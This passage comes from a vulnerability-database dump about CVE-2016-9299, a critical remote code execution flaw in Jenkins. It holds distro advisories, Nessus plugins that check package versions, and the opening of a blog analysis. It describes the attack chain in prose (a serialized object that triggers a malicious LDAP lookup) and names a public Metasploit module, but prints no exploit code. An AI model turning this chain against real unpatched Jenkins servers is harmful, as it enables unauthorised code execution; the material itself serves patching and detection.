"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2016-12-01T15:57:40", "id": "FEDORA:E7173602E415", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QFJT3TVJVZH5CAVZOY7CPBY3DK7E4CPO/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Jenkins is an award-winning, cross-platform, continuous integration and continuous delivery application that increases your productivity. Use Jenkins to build and test your software projects continuously making it easier for developers to integrate changes to the project, and making it easier for users to obtain a fresh build. It also allows you to continuously deliver your software by providing powerful ways to define your build pipelines and integrating with a large number of testing and deployment technologies. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-05T20:50:46", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: jenkins-1.651.3-2.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-03-05T20:50:46", "id": "FEDORA:ACB376074FEE", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZE7XYOLIPAJFIIPWZPAVZYEAOAT6LHIJ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "This package is primarily used by Jenkins for slave node management, but it could be potentially reused outside of this project. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-05T20:50:46", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: jenkins-remoting-2.62.3-1.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-03-05T20:50:46", "id": "FEDORA:CCC6D6078F5C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XKRLBXFPKTEBV4JI66GC2KQDE3TLZMYR/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:38:43", "description": "Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "Fedora 25 : jenkins / jenkins-remoting (2016-368780879d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], 
"modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:jenkins", "p-cpe:/a:fedoraproject:fedora:jenkins-remoting", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2016-368780879D.NASL", "href": "https://www.tenable.com/plugins/nessus/95446", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-368780879d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95446);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9299\");\n script_xref(name:\"FEDORA\", value:\"2016-368780879d\");\n\n script_name(english:\"Fedora 25 : jenkins / jenkins-remoting (2016-368780879d)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-368780879d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins and / or jenkins-remoting packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Jenkins CLI HTTP Java Deserialization Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"jenkins-1.651.3-2.fc25\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"jenkins-remoting-2.62.3-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins / jenkins-remoting\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:21", "description": "Jenkins Security Advisory :\n\nAn unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java object to the Jenkins CLI, making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading to code 
execution, bypassing existing protection mechanisms.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-16T00:00:00", "type": "nessus", "title": "FreeBSD : jenkins -- Remote code execution vulnerability in remoting module (27eee66d-9474-44a5-b830-21ec12a1c307)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:jenkins", "p-cpe:/a:freebsd:freebsd:jenkins-lts", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_27EEE66D947444A5B83021EC12A1C307.NASL", "href": "https://www.tenable.com/plugins/nessus/94918", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94918);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-9299\");\n\n script_name(english:\"FreeBSD : jenkins -- Remote code execution vulnerability in remoting module (27eee66d-9474-44a5-b830-21ec12a1c307)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jenkins Security Advisory :\n\nAn unauthenticated remote code execution vulnerability allowed\nattackers to transfer a serialized Java object to the Jenkins CLI,\nmaking Jenkins connect to an attacker-controlled LDAP server, which in\nturn can send a serialized payload leading to code execution,\nbypassing existing protection mechanisms.\"\n );\n # https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c434d472\"\n );\n # https://vuxml.freebsd.org/freebsd/27eee66d-9474-44a5-b830-21ec12a1c307.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5bd25ad\"\n );\n script_set_attribute(attribute:\"solution\", 
value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Jenkins CLI HTTP Java Deserialization Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins-lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"jenkins<=2.31\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"jenkins-lts<=2.19.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:21:16", "description": "Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-06T00:00:00", "type": "nessus", "title": "Fedora 24 : jenkins / jenkins-remoting (2016-93679a91df)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": 
false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:jenkins", "p-cpe:/a:fedoraproject:fedora:jenkins-remoting", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-93679A91DF.NASL", "href": "https://www.tenable.com/plugins/nessus/97533", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-93679a91df.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97533);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9299\");\n script_xref(name:\"FEDORA\", value:\"2016-93679a91df\");\n\n script_name(english:\"Fedora 24 : jenkins / jenkins-remoting (2016-93679a91df)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-93679a91df\"\n );\n 
script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins and / or jenkins-remoting packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Jenkins CLI HTTP Java Deserialization Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"jenkins-1.651.3-2.fc24\")) flag++;\nif (rpm_check(release:\"FC24\", reference:\"jenkins-remoting-2.62.3-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins / jenkins-remoting\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nJenkins Security Advisory:\n\nAn unauthenticated remote code execution vulnerability allowed\n\t attackers to transfer a serialized Java object to the Jenkins CLI,\n\t making Jenkins connect to an attacker-controlled LDAP server, which\n\t in turn can send a 
serialized payload leading to code execution,\n\t bypassing existing protection mechanisms.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-11T00:00:00", "type": "freebsd", "title": "jenkins -- Remote code execution vulnerability in remoting module", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2016-11-11T00:00:00", "id": "27EEE66D-9474-44A5-B830-21EC12A1C307", "href": "https://vuxml.freebsd.org/freebsd/27eee66d-9474-44a5-b830-21ec12a1c307.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java object to the Jenkins CLI, making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading to code execution, bypassing existing protection mechanisms. 
(CVE-2016-9299) \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-30T08:07:23", "type": "mageia", "title": "Updated jenkins-remoting packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2016-11-30T08:07:23", "id": "MGASA-2016-0406", "href": "https://advisories.mageia.org/MGASA-2016-0406.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-02-03T05:57:15", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 
5.9}, "published": "2022-05-14T01:00:43", "type": "osv", "title": "Improper Neutralization of Special Elements used in an LDAP Query in Jenkins", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2023-02-03T05:57:12", "id": "OSV:GHSA-2X9H-H3C4-WQQH", "href": "https://osv.dev/vulnerability/GHSA-2x9h-h3c4-wqqh", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2017-02-05T09:00:41", "edition": 2, "description": "Source: [gone with the wind's Blog](<https://www.iswin.org/2017/01/25/Jenkins-LDAP-Deserializable-Vulnerablity-CVE-2016-9299-Analysis/>)\n\nAuthor: [iswin](<https://www.iswin.org/about>)\n\nThis vulnerability in the last 11 month of official release announcement when I was concerned too, when he was looking for com. sun. jndi. ldap. 
LdapAttribute class I noticed that its _getAttributeSyntaxDefinition()_ and _getAttributeDefinition()_ methods might be a deserialization sink, but after searching through many classes I could not find one that reaches those two methods during deserialization; I assumed it was a JDK-internal matter and did not pursue it further. Later a foreign researcher presented this vulnerability in a slide deck; a quick look showed that it uses json to bypass the Jenkins deserialization filter. At the time I was busy with data-analysis work, so the matter stalled, and only recently, after Metasploit published a payload and my workload eased, did I study it properly. The vulnerability is quite interesting and touches a fairly broad range of knowledge; credit is due to those who found it.\n\nWhenever a vulnerability like this appears I ask myself why I could not find it, and every time I finish analysing one I find that the gap is not small.\n\n#### Technology is for sharing, so that we can all progress.\n\n### Vulnerability description\n\nOn 16 November 2016 the Jenkins project published a security advisory for [CVE-2016-9299](<https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16>). From the advisory it is still a deserialization vulnerability, but one that involves LDAP: after deserialization, Jenkins is made to connect to a malicious LDAP server. Jenkins' fix for earlier deserialization issues was to blacklist certain malicious classes, so the first step is to bypass that official blacklist. That is about all the information the advisory gives, and its PoC only mentions the com. sun. jndi. ldap. 
